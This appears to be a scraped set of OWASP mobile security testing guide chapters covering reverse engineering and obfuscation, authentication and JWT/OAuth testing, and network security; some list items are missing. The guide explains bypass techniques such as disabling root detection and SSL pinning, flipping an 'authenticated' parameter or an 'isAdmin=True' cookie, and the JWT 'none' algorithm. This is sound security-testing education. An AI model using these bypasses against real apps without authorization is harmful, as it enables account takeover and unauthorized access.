Reverse engineering is an art, and describing its every facet would fill a whole library. The sheer range of techniques and specializations is mind-blowing: one can spend years working on a very specific and isolated sub-problem, such as automating malware analysis or developing novel de-obfuscation methods. Security testers are generalists; to be effective reverse engineers, they must filter through the vast amount of relevant information.
There is no generic reverse engineering process that always works. That said, we'll describe commonly used methods and tools later in this guide, and give examples of tackling the most common defenses.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#why-you-need-it","title":"Why You Need It","text":"Mobile security testing requires at least basic reverse engineering skills for several reasons:
1. To enable black-box testing of mobile apps. Modern apps often include controls that will hinder dynamic analysis. SSL pinning and end-to-end (E2E) encryption sometimes prevent you from intercepting or manipulating traffic with a proxy. Root detection could prevent the app from running on a rooted device, preventing you from using advanced testing tools. You must be able to deactivate these defenses.
2. To enhance static analysis in black-box security testing. In a black-box test, static analysis of the app bytecode or binary code helps you understand the internal logic of the app. It also allows you to identify flaws such as hardcoded credentials.
3. To assess resilience against reverse engineering. Apps that implement the software protection measures listed in the Mobile Application Security Verification Standard Anti-Reversing Controls (MASVS-R) should withstand reverse engineering to a certain degree. To verify the effectiveness of such controls, the tester may perform a resilience assessment as part of the general security test. For the resilience assessment, the tester assumes the role of the reverse engineer and attempts to bypass defenses.
Before we dive into the world of mobile app reversing, we have some good news and some bad news. Let's start with the good news:
Ultimately, the reverse engineer always wins.
This is particularly true in the mobile industry, where the reverse engineer has a natural advantage: the way mobile apps are deployed and sandboxed is by design more restrictive than the deployment and sandboxing of classical Desktop apps, so including the rootkit-like defensive mechanisms often found in Windows software (e.g., DRM systems) is simply not feasible. The openness of Android allows reverse engineers to make favorable changes to the operating system, aiding the reverse engineering process. iOS gives reverse engineers less control, but defensive options are also more limited.
The bad news is that dealing with multi-threaded anti-debugging controls, cryptographic white-boxes, stealthy anti-tampering features, and highly complex control flow transformations is not for the faint-hearted. The most effective software protection schemes are proprietary and won't be beaten with standard tweaks and tricks. Defeating them requires tedious manual analysis, coding, frustration and, depending on your personality, sleepless nights and strained relationships.
It's easy for beginners to get overwhelmed by the sheer scope of reversing. The best way to get started is to set up some basic tools (see the relevant sections in the Android and iOS reversing chapters) and start with simple reversing tasks and crackmes. You'll need to learn about the assembler/bytecode language, the operating system, obfuscations you encounter, and so on. Start with simple tasks and gradually level up to more difficult ones.
In the following section, we'll give an overview of the techniques most commonly used in mobile app security testing. In later chapters, we'll drill down into OS-specific details of both Android and iOS.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#basic-tampering-techniques","title":"Basic Tampering Techniques","text":""},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#binary-patching","title":"Binary Patching","text":"Patching is the process of changing the compiled app, e.g., changing code in binary executables, modifying Java bytecode, or tampering with resources. This process is known as modding in the mobile game hacking scene. Patches can be applied in many ways, including editing binary files in a hex editor and decompiling, editing, and re-assembling an app. We'll give detailed examples of useful patches in later chapters.
Keep in mind that modern mobile operating systems strictly enforce code signing, so running modified apps is not as straightforward as it used to be in desktop environments. Security experts had a much easier life in the 90s! Fortunately, patching is not very difficult if you work on your own device. You simply have to re-sign the app or disable the default code signature verification facilities to run modified code.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#code-injection","title":"Code Injection","text":"Code injection is a very powerful technique that allows you to explore and modify processes at runtime. Injection can be implemented in various ways, but you'll get by without knowing all the details thanks to freely available, well-documented tools that automate the process. These tools give you direct access to process memory and important structures such as live objects instantiated by the app. They come with many utility functions that are useful for resolving loaded libraries, hooking methods and native functions, and more. Process memory tampering is more difficult to detect than file patching, so it is the preferred method in most cases.
Substrate, Frida, and Xposed are the most widely used hooking and code injection frameworks in the mobile industry. The three frameworks differ in design philosophy and implementation details: Substrate and Xposed focus on code injection and/or hooking, while Frida aims to be a full-blown \"dynamic instrumentation framework\", incorporating code injection, language bindings, and an injectable JavaScript VM and console.
However, you can also instrument apps with Substrate by using it to inject Cycript, the programming environment (aka \"Cycript-to-JavaScript\" compiler) authored by Saurik of Cydia fame. To complicate things even more, Frida's authors also created a fork of Cycript called \"frida-cycript\". It replaces Cycript's runtime with a Frida-based runtime called Mj\u00f8lner. This enables Cycript to run on all the platforms and architectures maintained by frida-core (if you are confused at this point, don't worry). The release of frida-cycript was accompanied by a blog post by Frida's developer Ole titled \"Cycript on Steroids\", a title that Saurik wasn't very fond of.
We'll include examples of all three frameworks. We recommend starting with Frida because it is the most versatile of the three (for this reason, we'll also include more Frida details and examples). Notably, Frida can inject a JavaScript VM into a process on both Android and iOS, while Cycript injection with Substrate only works on iOS. Ultimately, however, you can of course achieve many of the same goals with either framework.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#static-and-dynamic-binary-analysis","title":"Static and Dynamic Binary Analysis","text":"Reverse engineering is the process of reconstructing the semantics of a compiled program's source code. In other words, you take the program apart, run it, simulate parts of it, and do other unspeakable things to it to understand what it does and how.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#using-disassemblers-and-decompilers","title":"Using Disassemblers and Decompilers","text":"Disassemblers and decompilers allow you to translate an app's binary code or bytecode back into a more or less understandable format. By using these tools on native binaries, you can obtain assembler code that matches the architecture the app was compiled for. Disassemblers convert machine code to assembly code which in turn is used by decompilers to generate equivalent high-level language code. Android Java apps can be disassembled to smali, which is an assembly language for the DEX format used by Dalvik, Android's Java VM. Smali assembly can also be quite easily decompiled back to equivalent Java code.
In theory, the mapping between assembly and machine code should be one-to-one, and therefore it may give the impression that disassembling is a simple task. But in practice, there are multiple pitfalls such as:
Similarly, decompilation is a very complicated process, involving many deterministic and heuristic based approaches. As a consequence, decompilation is usually not really accurate, but nevertheless very helpful in getting a quick understanding of the function being analyzed. The accuracy of decompilation depends on the amount of information available in the code being decompiled and the sophistication of the decompiler. In addition, many compilation and post-compilation tools introduce additional complexity to the compiled code in order to increase the difficulty of comprehension and/or even decompilation itself. Such code referred to as obfuscated code.
Over the past decades many tools have perfected the process of disassembly and decompilation, producing output with high fidelity. Advanced usage instructions for any of the available tools can often easily fill a book of their own. The best way to get started is to simply pick up a tool that fits your needs and budget and get a well-reviewed user guide. In this section, we will provide an introduction to some of those tools and in the subsequent \"Reverse Engineering and Tampering\" Android and iOS chapters we'll focus on the techniques themselves, especially those that are specific to the platform at hand.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#obfuscation","title":"Obfuscation","text":"Obfuscation is the process of transforming code and data to make it more difficult to comprehend (and sometimes even difficult to disassemble). It is usually an integral part of the software protection scheme. Obfuscation isn't something that can be simply turned on or off, programs can be made incomprehensible, in whole or in part, in many ways and to different degrees.
Note: All presented techniques below will not stop someone with enough time and budget from reverse engineering your app. However, combining these techniques will make their job significantly harder. The aim is thus to discourage reverse engineers from performing further analysis and not making it worth the effort.
The following techniques can be used to obfuscate an application:
The standard compiler generates binary symbols based on class and function names from the source code. Therefore, if no obfuscation is applied, symbol names remain meaningful and can easily be extracted from the app binary. For instance, a function which detects a jailbreak can be located by searching for relevant keywords (e.g. \"jailbreak\"). The listing below shows the disassembled function JailbreakDetectionViewController.jailbreakTest4Tapped
from the Damn Vulnerable iOS App (DVIA-v2).
__T07DVIA_v232JailbreakDetectionViewControllerC20jailbreakTest4TappedyypF:\nstp x22, x21, [sp, #-0x30]!\nmov rbp, rsp\n
After the obfuscation we can observe that the symbol\u2019s name is no longer meaningful as shown on the listing below.
__T07DVIA_v232zNNtWKQptikYUBNBgfFVMjSkvRdhhnbyyFySbyypF:\nstp x22, x21, [sp, #-0x30]!\nmov rbp, rsp\n
Nevertheless, this only applies to the names of functions, classes and fields. The actual code remains unmodified, so an attacker can still read the disassembled version of the function and try to understand its purpose (e.g. to retrieve the logic of a security algorithm).
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#instruction-substitution","title":"Instruction Substitution","text":"This technique replaces standard binary operators like addition or subtraction with more complex representations. For example, an addition x = a + b
can be represented as x = -(-a) - (-b)
. However, using the same replacement representation could be easily reversed, so it is recommended to add multiple substitution techniques for a single case and introduce a random factor. This technique can be reversed during decompilation, but depending on the complexity and depth of the substitutions, reversing it can still be time consuming.
Control flow flattening replaces original code with a more complex representation. The transformation breaks the body of a function into basic blocks and puts them all inside a single infinite loop with a switch statement that controls the program flow. This makes the program flow significantly harder to follow because it removes the natural conditional constructs that usually make the code easier to read.
The image shows how control flow flattening alters code. See \"Obfuscating C++ programs via control flow flattening\" for more information.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#dead-code-injection","title":"Dead Code Injection","text":"This technique makes the program's control flow more complex by injecting dead code into the program. Dead code is a stub of code that doesn\u2019t affect the original program\u2019s behavior but increases the overhead of the reverse engineering process.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#string-encryption","title":"String Encryption","text":"Applications are often compiled with hardcoded keys, licences, tokens and endpoint URLs. By default, all of them are stored in plaintext in the data section of an application\u2019s binary. This technique encrypts these values and injects stubs of code into the program that will decrypt that data before it is used by the program.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#packing","title":"Packing","text":"Packing is a dynamic rewriting obfuscation technique which compresses or encrypts the original executable into data and dynamically recovers it during execution. Packing an executable changes the file signature in an attempt to avoid signature-based detection.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#debugging-and-tracing","title":"Debugging and Tracing","text":"In the traditional sense, debugging is the process of identifying and isolating problems in a program as part of the software development life cycle. The same tools used for debugging are valuable to reverse engineers even when identifying bugs is not the primary goal. Debuggers enable program suspension at any point during runtime, inspection of the process' internal state, and even register and memory modification. These abilities simplify program inspection.
Debugging usually means interactive debugging sessions in which a debugger is attached to the running process. In contrast, tracing refers to passive logging of information about the app's execution (such as API calls). Tracing can be done in several ways, including debugging APIs, function hooks, and Kernel tracing facilities. Again, we'll cover many of these techniques in the OS-specific \"Reverse Engineering and Tampering\" chapters.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#advanced-techniques","title":"Advanced Techniques","text":"For more complicated tasks, such as de-obfuscating heavily obfuscated binaries, you won't get far without automating certain parts of the analysis. For example, understanding and simplifying a complex control flow graph based on manual analysis in the disassembler would take you years (and most likely drive you mad long before you're done). Instead, you can augment your workflow with custom made tools. Fortunately, modern disassemblers come with scripting and extension APIs, and many useful extensions are available for popular disassemblers. There are also open source disassembling engines and binary analysis frameworks.
As always in hacking, the anything-goes rule applies: simply use whatever is most efficient. Every binary is different, and all reverse engineers have their own style. Often, the best way to achieve your goal is to combine approaches (such as emulator-based tracing and symbolic execution). To get started, pick a good disassembler and/or reverse engineering framework, then get comfortable with their particular features and extension APIs. Ultimately, the best way to get better is to get hands-on experience.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#dynamic-binary-instrumentation","title":"Dynamic Binary Instrumentation","text":"Another useful approach for native binaries is dynamic binary instrumentations (DBI). Instrumentation frameworks such as Valgrind and PIN support fine-grained instruction-level tracing of single processes. This is accomplished by inserting dynamically generated code at runtime. Valgrind compiles fine on Android, and pre-built binaries are available for download.
The Valgrind README includes specific compilation instructions for Android.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#emulation-based-dynamic-analysis","title":"Emulation-based Dynamic Analysis","text":"Emulation is an imitation of a certain computer platform or program being executed in different platform or within another program. The software or hardware performing this imitation is called an emulator. Emulators provide a much cheaper alternative to an actual device, where a user can manipulate it without worrying about damaging the device. There are multiple emulators available for Android, but for iOS there are practically no viable emulators available. iOS only has a simulator, shipped within Xcode.
The difference between a simulator and an emulator often causes confusion and leads to use of the two terms interchangeably, but in reality they are different, specially for the iOS use case. An emulator mimics both the software and hardware environment of a targeted platform. On the other hand, a simulator only mimics the software environment.
QEMU based emulators for Android take into consideration the RAM, CPU, battery performance etc (hardware components) while running an application, but in an iOS simulator this hardware component behaviour is not taken into consideration at all. The iOS simulator even lacks the implementation of the iOS kernel, as a result if an application is using syscalls it cannot be executed in this simulator.
In simple words, an emulator is a much closer imitation of the targeted platform, while a simulator mimics only a part of it.
Running an app in the emulator gives you powerful ways to monitor and manipulate its environment. For some reverse engineering tasks, especially those that require low-level instruction tracing, emulation is the best (or only) choice. Unfortunately, this type of analysis is only viable for Android, because no free or open source emulator exists for iOS (the iOS simulator is not an emulator, and apps compiled for an iOS device don't run on it). The only iOS emulator available is a commercial SaaS solution - Corellium. We'll provide an overview of popular emulation-based analysis frameworks for Android in the \"Tampering and Reverse Engineering on Android\" chapter.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#custom-tooling-with-reverse-engineering-frameworks","title":"Custom Tooling with Reverse Engineering Frameworks","text":"Even though most professional GUI-based disassemblers feature scripting facilities and extensibility, they are simply not well-suited to solving particular problems. Reverse engineering frameworks allow you to perform and automate any kind of reversing task without depending on a heavy-weight GUI. Notably, most reversing frameworks are open source and/or available for free. Popular frameworks with support for mobile architectures include radare2 and Angr.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#example-program-analysis-with-symbolicconcolic-execution","title":"Example: Program Analysis with Symbolic/Concolic Execution","text":"In the late 2000s, testing based on symbolic execution has become a popular way to identify security vulnerabilities. Symbolic \"execution\" actually refers to the process of representing possible paths through a program as formulas in first-order logic. Satisfiability Modulo Theories (SMT) solvers are used to check the satisfiability of these formulas and provide solutions, including concrete values of the variables needed to reach a certain point of execution on the path corresponding to the solved formula.
In simple words, symbolic execution is mathematically analyzing a program without executing it. During analysis, each unknown input is represented as a mathematical variable (a symbolic value), and hence all the operations performed on these variables are recorded as a tree of operations (aka. AST (abstract syntax tree), from compiler theory). These ASTs can be translated into so-called constraints that will be interpreted by a SMT solver. In the end of this analysis, a final mathematical equation is obtained, in which the variables are the inputs whose values are not known. SMT solvers are special programs which solve these equations to give possible values for the input variables given a final state.
To illustrate this, imagine a function which takes one input (x
) and multiplies it by the value of a second input (y
). Finally, there is an if condition which checks if the value calculated is greater than the value of an external variable(z
), and returns \"success\" if true, else returns \"fail\". The equation for this operation will be (x * y) > z
.
If we want the function to always return \"success\" (final state), we can tell the SMT solver to calculate the values for x
and y
(input variables) which satisfy the corresponding equation. As is the case for global variables, their value can be changed from outside this function, which may lead to different outputs whenever this function is executed. This adds to additional complexity in determining correct solution.
Internally, SMT solvers use various equation-solving techniques to generate solutions for such equations.
In a real world situation, the functions are much more complex than the above example. The increased complexity of the functions can pose significant challenges for classical symbolic execution. Some of the challenges are summarised below:
To overcome these challenges, typically, symbolic execution is combined with other techniques such as dynamic execution (also called concrete execution) to mitigate the path explosion problem specific to classical symbolic execution. This combination of concrete (actual) and symbolic execution is referred to as concolic execution\u00a0(the name concolic stems from concrete and symbolic), sometimes also called as dynamic symbolic execution.
To visualize this, in the above example, we can obtain the value of the external variable by performing further reverse engineering or by dynamically executing the program and feeding this information into our symbolic execution analysis. This extra information will reduce the complexity of our equations and may produce more accurate analysis results. Together with improved SMT solvers and current hardware speeds, concolic execution allows to explore paths in medium-size software modules (i.e., on the order of 10 KLOC).
In addition, symbolic execution also comes in handy for supporting de-obfuscation tasks, such as simplifying control flow graphs. For example, Jonathan Salwan and Romain Thomas have shown how to reverse engineer VM-based software protections using Dynamic Symbolic Execution [#salwan] (i.e., using a mix of actual execution traces, simulation, and symbolic execution).
In the Android section, you'll find a walkthrough for cracking a simple license check in an Android application using symbolic execution.
"},{"location":"MASTG/General/0x04c-Tampering-and-Reverse-Engineering/#references","title":"References","text":"Authentication and authorization problems are prevalent security vulnerabilities. In fact, they consistently rank second highest in the OWASP Top 10.
Most mobile apps implement some kind of user authentication. Even though part of the authentication and state management logic is performed by the backend service, authentication is such an integral part of most mobile app architectures that understanding its common implementations is important.
Since the basic concepts are identical on iOS and Android, we'll discuss prevalent authentication and authorization architectures and pitfalls in this generic guide. OS-specific authentication issues, such as local and biometric authentication, will be discussed in the respective OS-specific chapters.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#general-assumptions","title":"General Assumptions","text":""},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#appropriate-authentication-is-in-place","title":"Appropriate Authentication is in Place","text":"Perform the following steps when testing authentication and authorization:
Authentication bypass vulnerabilities exist when authentication state is not consistently enforced on the server and when the client can tamper with the state. While the backend service is processing requests from the mobile client, it must consistently enforce authorization checks: verifying that the user is logged in and authorized every time a resource is requested.
Consider the following example from the OWASP Web Testing Guide. In the example, a web resource is accessed through a URL, and the authentication state is passed through a GET parameter:
http://www.site.com/page.asp?authenticated=no\n
The client can arbitrarily change the GET parameters sent with the request. Nothing prevents the client from simply changing the value of the authenticated
parameter to \"yes\", effectively bypassing authentication.
Although this is a simplistic example that you probably won't find in the wild, programmers sometimes rely on \"hidden\" client-side parameters, such as cookies, to maintain authentication state. They assume that these parameters can't be tampered with. Consider, for example, the following classic vulnerability in Nortel Contact Center Manager. The administrative web application of Nortel's appliance relied on the cookie \"isAdmin\" to determine whether the logged-in user should be granted administrative privileges. Consequently, it was possible to get admin access by simply setting the cookie value as follows:
isAdmin=True\n
Security experts used to recommend using session-based authentication and maintaining session data on the server only. This prevents any form of client-side tampering with the session state. However, the whole point of using stateless authentication instead of session-based authentication is to not have session state on the server. Instead, state is stored in client-side tokens and transmitted with every request. In this case, seeing client-side parameters such as isAdmin
is perfectly normal.
To prevent tampering, cryptographic signatures are added to client-side tokens. Of course, things may go wrong, and popular implementations of stateless authentication have been vulnerable to attacks. For example, the signature verification of some JSON Web Token (JWT) implementations could be deactivated by setting the signature type to \"None\".
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#best-practices-for-passwords","title":"Best Practices for Passwords","text":"Password strength is a key concern when passwords are used for authentication. The password policy defines requirements to which end users should adhere. A password policy typically specifies password length, password complexity, and password topologies. A \"strong\" password policy makes manual or automated password cracking difficult or impossible. For further information please consult the OWASP Authentication Cheat Sheet.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#general-guidelines-on-testing-authentication","title":"General Guidelines on Testing Authentication","text":"There's no one-size-fits-all approach to authentication. When reviewing the authentication architecture of an app, you should first consider whether the authentication method(s) used are appropriate in the given context. Authentication can be based on one or more of the following:
The number of authentication procedures implemented by mobile apps depends on the sensitivity of the functions or accessed resources. Refer to industry best practices when reviewing authentication functions. Username/password authentication (combined with a reasonable password policy) is generally considered sufficient for apps that have a user login and aren't very sensitive. This form of authentication is used by most social media apps.
For sensitive apps, adding a second authentication factor is usually appropriate. This includes apps that provide access to very sensitive information (such as credit card numbers) or allow users to transfer funds. In some industries, these apps must also comply with certain standards. For example, financial apps have to ensure compliance with the Payment Card Industry Data Security Standard (PCI DSS), the Gramm Leach Bliley Act, and the Sarbanes-Oxley Act (SOX). Compliance considerations for the US health care sector include the Health Insurance Portability and Accountability Act (HIPAA) and the Patient Safety Rule.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#stateful-vs-stateless-authentication","title":"Stateful vs. Stateless Authentication","text":"You'll usually find that the mobile app uses HTTP as the transport layer. The HTTP protocol itself is stateless, so there must be a way to associate a user's subsequent HTTP requests with that user. Otherwise, the user's login credentials would have to be sent with every request. Also, both the server and client need to keep track of user data (e.g., the user's privileges or role). This can be done in two different ways:
With stateful authentication, a unique session id is generated when the user logs in. In subsequent requests, this session ID serves as a reference to the user details stored on the server. The session ID is opaque; it doesn't contain any user data.
With stateless authentication, all user-identifying information is stored in a client-side token. The token can be passed to any server or micro service, eliminating the need to maintain session state on the server. Stateless authentication is often factored out to an authorization server, which produces, signs, and optionally encrypts the token upon user login.
Web applications commonly use stateful authentication with a random session ID that is stored in a client-side cookie. Although mobile apps sometimes use stateful sessions in a similar fashion, stateless token-based approaches are becoming popular for a variety of reasons:
As a mobile security tester, you should be familiar with both types of authentication.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#stateful-authentication","title":"Stateful Authentication","text":"Stateful (or \"session-based\") authentication is characterized by authentication records on both the client and server. The authentication flow is as follows:
When sessions are improperly managed, they are vulnerable to a variety of attacks that may compromise the session of a legitimate user, allowing the attacker to impersonate the user. This may result in lost data, compromised confidentiality, and illegitimate actions.
Best Practices:
Locate any server-side endpoints that provide sensitive information or functions and verify the consistent enforcement of authorization. The backend service must verify the user's session ID or token and make sure that the user has sufficient privileges to access the resource. If the session ID or token is missing or invalid, the request must be rejected.
Make sure that:
Authentication shouldn't be implemented from scratch but built on top of proven frameworks. Many popular frameworks provide ready-made authentication and session management functionality. If the app uses framework APIs for authentication, check the framework security documentation for best practices. Security guides for common frameworks are available at the following links:
A great resource for testing server-side authentication is the OWASP Web Testing Guide, specifically the Testing Authentication and Testing Session Management chapters.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#stateless-authentication","title":"Stateless Authentication","text":"Token-based authentication is implemented by sending a signed token (verified by the server) with each HTTP request. The most commonly used token format is the JSON Web Token, defined in RFC7519. A JWT may encode the complete session state as a JSON object. Therefore, the server doesn't have to store any session data or authentication information.
JWT tokens consist of three Base64Url-encoded parts separated by dots. The Token structure is as follows:
base64UrlEncode(header).base64UrlEncode(payload).base64UrlEncode(signature)\n
The following example shows a Base64Url-encoded JSON Web Token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6Ikpva\nG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ\n
The header typically consists of two parts: the token type, which is JWT, and the hashing algorithm being used to compute the signature. In the example above, the header decodes as follows:
{\"alg\":\"HS256\",\"typ\":\"JWT\"}\n
The second part of the token is the payload, which contains so-called claims. Claims are statements about an entity (typically, the user) and additional metadata. For example:
{\"sub\":\"1234567890\",\"name\":\"John Doe\",\"admin\":true}\n
The signature is created by applying the algorithm specified in the JWT header to the encoded header, encoded payload, and a secret value. For example, when using the HMAC SHA256 algorithm the signature is created in the following way:
HMACSHA256(base64UrlEncode(header) + \".\" + base64UrlEncode(payload), secret)\n
Note that the secret is shared between the authentication server and the backend service - the client does not know it. This proves that the token was obtained from a legitimate authentication service. It also prevents the client from tampering with the claims contained in the token.
Best Practices:
Verify that the implementation adheres to JWT best practices:
jti
(JWT ID) claim, which gives the JWT a unique identifier.aud
(audience) claim, which defines for which application the token is entitled.none
, indicating that \"the integrity of the token has already been verified\". Some libraries might treat tokens signed with the none
algorithm as if they were valid tokens with verified signatures, so the application will trust altered token claims.There are two different Burp Plugins that can help you for testing the vulnerabilities listed above:
Also, make sure to check out the OWASP JWT Cheat Sheet for additional information.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#oauth-20","title":"OAuth 2.0","text":"OAuth 2.0 is an authorization framework that enables third-party applications to obtain limited access to user accounts on remote HTTP services such as APIs and web-enabled applications.
Common uses for OAuth2 include:
According to OAuth 2.0, a mobile client seeking access to a user's resources must first ask the user to authenticate against an authentication server. With the user's approval, the authorization server then issues a token that allows the app to act on behalf of the user. Note that the OAuth2 specification doesn't define any particular kind of authentication or access token format.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#protocol-overview","title":"Protocol Overview","text":"OAuth 2.0 defines four roles:
Note: The API fulfills both the Resource Server and Authorization Server roles. Therefore, we will refer to both as the API.
Here is a more detailed explanation of the steps in the diagram:
In OAuth2, the user agent is the entity that performs the authentication. OAuth2 authentication can be performed either through an external user agent (e.g. Chrome or Safari) or in the app itself (e.g. through a WebView embedded into the app or an authentication library). Neither of the two modes is intrinsically \"better\" than the other. The choice depends on the app's specific use case and threat model.
External User Agent: Using an external user agent is the method of choice for apps that need to interact with social media accounts (Facebook, Twitter, etc.). Advantages of this method include:
On the negative side, there is no way to control the behavior of the browser (e.g. to activate certificate pinning).
Embedded User Agent: Using an embedded user agent is the method of choice for apps that need to operate within a closed ecosystem, for example to interact with corporate accounts. For example, consider a banking app that uses OAuth2 to retrieve an access token from the bank's authentication server, which is then used to access a number of micro services. In that case, credential phishing is not a viable scenario. It is likely preferable to keep the authentication process in the (hopefully) carefully secured banking app, instead of placing trust on external components.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#best-practices","title":"Best Practices","text":"For additional best practices and detailed information please refer to the following source documents:
Some of the best practices include but are not limited to:
Failing to destroy the server-side session is one of the most common logout functionality implementation errors. This error keeps the session or token alive, even after the user logs out of the application. An attacker who gets valid authentication information can continue to use it and hijack a user's account.
Many mobile apps don't automatically log users out. There can be various reasons, such as: because it is inconvenient for customers, or because of decisions made when implementing stateless authentication. The application should still have a logout function, and it should be implemented according to best practices, destroying all locally stored tokens or session identifiers.
If session information is stored on the server, it should be destroyed by sending a logout request to that server. In case of a high-risk application, tokens should be invalidated. Not removing tokens or session identifiers can result in unauthorized access to the application in case the tokens are leaked. Note that other sensitive types of information should be removed as well, as any information that is not properly cleared may be leaked later, for example during a device backup.
Here are different examples of session termination for proper server-side logout:
If access and refresh tokens are used with stateless authentication, they should be deleted from the mobile device. The refresh token should be invalidated on the server.
The OWASP Web Testing Guide (WSTG-SESS-06) includes a detailed explanation and more test cases.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#supplementary-authentication","title":"Supplementary Authentication","text":"Authentication schemes are sometimes supplemented by passive contextual authentication, which can incorporate:
Ideally, in such a system the user's context is compared to previously recorded data to identify anomalies that might indicate account abuse or potential fraud. This process is transparent to the user, but can become a powerful deterrent to attackers.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#two-factor-authentication","title":"Two-factor Authentication","text":"Two-factor authentication (2FA) is standard for apps that allow users to access sensitive functions and data. Common implementations use a password for the first factor and any of the following as the second factor:
Whatever option is used, it always must be enforced and verified on the server-side and never on client-side. Otherwise the 2FA can be easily bypassed within the app.
The 2FA can be performed at login or later in the user's session.
For example, after logging in to a banking app with a username and PIN, the user is authorized to perform non-sensitive tasks. Once the user attempts to execute a bank transfer, the second factor (\"step-up authentication\") must be presented.
Best Practices:
Although one-time passwords (OTP) sent via SMS are a common second factor for two-factor authentication, this method has its shortcomings. In 2016, NIST suggested: \"Due to the risk that SMS messages may be intercepted or redirected, implementers of new systems SHOULD carefully consider alternative authenticators.\". Below you will find a list of some related threats and suggestions to avoid successful attacks on SMS-OTP.
Threats:
You can find below several suggestions to reduce the likelihood of exploitation when using SMS for OTP:
SMS-OTP Research:
Another strong alternative mechanism for implementing a second factor is transaction signing.
Transaction signing requires authentication of the user's approval of critical transactions. Asymmetric cryptography is the best way to implement transaction signing. The app will generate a public/private key pair when the user signs up, then registers the public key on the backend. The private key is securely stored in the KeyStore (Android) or KeyChain (iOS). To authorize a transaction, the backend sends the mobile app a push notification containing the transaction data. The user is then asked to confirm or deny the transaction. After confirmation, the user is prompted to unlock the Keychain (by entering the PIN or fingerprint), and the data is signed with user's private key. The signed transaction is then sent to the server, which verifies the signature with the user's public key.
"},{"location":"MASTG/General/0x04e-Testing-Authentication-and-Session-Management/#login-activity-and-device-blocking","title":"Login Activity and Device Blocking","text":"It is a best practice that apps should inform the user about all login activities within the app with the possibility of blocking certain devices. This can be broken down into various scenarios:
The developer can make use of specific meta-information and associate it to each different activity or event within the application. This will make it easier for the user to spot suspicious behavior and block the corresponding device. The meta-information may include:
The application can provide a list of activities history which will be updated after each sensitive activity within the application. The choice of which activities to audit needs to be done for each application based on the data it handles and the level of security risk the team is willing to have. Below is a list of common sensitive activities that are usually audited:
Paid content requires special care, and additional meta-information (e.g., operation cost, credit, etc.) might be used to ensure user's knowledge about the whole operation's parameters.
In addition, non-repudiation mechanisms should be applied to sensitive transactions (e.g. paid content access, given consent to Terms and Conditions clauses, etc.) in order to prove that a specific transaction was in fact performed (integrity) and by whom (authentication).
Lastly, it should be possible for the user to log out specific open sessions and in some cases it might be interesting to fully block certain devices using a device identifier.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/","title":"Mobile App Network Communication","text":"Practically every network-connected mobile app uses the Hypertext Transfer Protocol (HTTP) or HTTP over Transport Layer Security (TLS), HTTPS, to send and receive data to and from remote endpoints. Consequently, network-based attacks (such as packet sniffing and man-in-the-middle-attacks) are a problem. In this chapter we discuss potential vulnerabilities, testing techniques, and best practices concerning the network communication between mobile apps and their endpoints.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#secure-connections","title":"Secure Connections","text":"The time has long passed since it was reasonable to use cleartext HTTP alone and it's usually trivial to secure HTTP connections using HTTPS. HTTPS is essentially HTTP layered on top of another protocol known as Transport Layer Security (TLS). And TLS performs a handshake using public key cryptography and, when complete, creates a secure connection.
An HTTPS connection is considered secure because of three properties:
Certificate Authorities (CAs) are an integral part of a secure client server communication and they are predefined in the trust store of each operating system. For instance, on iOS there are more than 200 root certificates installed (see Apple documentation - Available trusted root certificates for Apple operating systems)
CAs can be added to the trust store, either manually by the user, by an MDM that manages the enterprise device or through malware. The question is then: \"can you trust all of those CAs and should your app rely on the default trust store?\". After all, there are well-known cases where certificate authorities have been compromised or tricked into issuing certificates to impostors. A detailed timeline of CA breaches and failures can be found at sslmate.com.
Both Android and iOS allow the user to install additional CAs or trust anchors.
An app may want to trust a custom set of CAs instead of the platform default. The most common reasons for this are:
Whenever the app connects to a server whose certificate is self-signed or unknown to the system, the secure connection will fail. This is typically the case for any non public CAs, for instance those issued by an organization such as a government, corporation, or education institution for their own use.
Both Android and iOS offer means to extend trust, i.e. include additional CAs so that the app trusts the system's built-in ones plus the custom ones.
However, remember that the device users are always able to include additional CAs. Therefore, depending on the threat model of the app it might be necessary to avoid trusting any certificates added to the user trust store or even go further and only trust a pre-defined specific certificate or set of certificates.
